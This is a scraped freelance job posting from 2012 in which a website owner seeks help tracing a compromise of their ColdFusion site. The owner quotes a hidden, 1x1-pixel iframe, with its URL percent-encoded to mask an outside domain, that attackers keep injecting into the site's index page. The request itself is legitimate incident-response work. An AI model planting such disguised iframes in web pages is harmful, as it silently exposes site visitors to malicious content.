176985602337900

Find freelancers. Lose those costly delays.

With 1.7 million freelancers, we'll match you with the perfect talent.

or, Register with Elance »

Cross Site Injection Hack XSS - on ColdFusion application
Sign in to Add to Watch List

IT & Programming > Networking & Security

View Change History

The client has made the following changes to the job.

Description
Date
Close

Job Description

  |  Change History >>

Updated

Close
  • Posted: Wed, Aug 22, 2012
  • Time Left: Closed
  • Location: Anywhere
  • Client prefers freelancers from:
    Anywhere

    You are still able to submit a proposal for this job.

    The client prefers freelancers from
    a different location.

    You're still able to submit a proposal for this job, regardless of your location.
  • Start: Immediately
  • Budget: Not Sure
  • Fixed Price Job
  • Elance Escrow Protection
  • U.S. freelancers must have W9
Sign in to view client's details

We have a web site that uses Coldfusion 9.++ that has been hacked and they are inserting the following <iframe> command.

<iframe scrolling="no" frameborder="0" src="http://%77%77%77%2E%63%6F%6C%6C%65%67%65%66%75%6E%34%75%2E%63%6F%6D" width="1" height="1"></iframe>

pointing at   [obscured]   into our main index page.

We need help in finding out how they are doing this. We have done a number of things, including making sure that the forms we are using are not outputing the input without checking and modifying it.

Sign in or Register to see more

Job ID: 32939057
Proposals
Avg $ | High $ | Low $ — Show Pricing
  • Submit Date (Latest)

 Romania  |  
INVITED
A team of highly skilled and creative developers specialized in providing high technology, end-to-end solutions (requirements gathering, database...
3
  |  
 0.0   |  Private   |  1 Jobs   |  1 verified credential(s)
Bid ID: 33283611  |  Submitted: Sep 5, 2012 06:52 ET 
Proposal SEALED

 United States  |  
*** RANKED TOP 1% ON ELANCE (out of 216,094 individuals) *** I can do anything from Web Development (ColdFusion 6+ years, Javascript, AJAX,...
4
  |  
 5.0   |  Private   |  1 Jobs
Bid ID: 33006077  |  Submitted: Aug 25, 2012 11:31 ET 
Proposal SEALED

 United States  |  
The most trusted security analyst on Elance! I offer world-class incident response, malware cleanup, and other assistance related to hacking /...
9
  |  
 5.0   |  Private   |  320 Jobs   |  4 verified credential(s)
Bid ID: 32940418  |  Submitted: Aug 22, 2012 23:22 ET 
Proposal SEALED
Sign in to Elance and start working on jobs today.
Sign in to view more of the job details and submit a proposal. Once registered, you'll have access to thousands of jobs online or through email.
Are you ready to post a job like this one?
Post a Similar Job »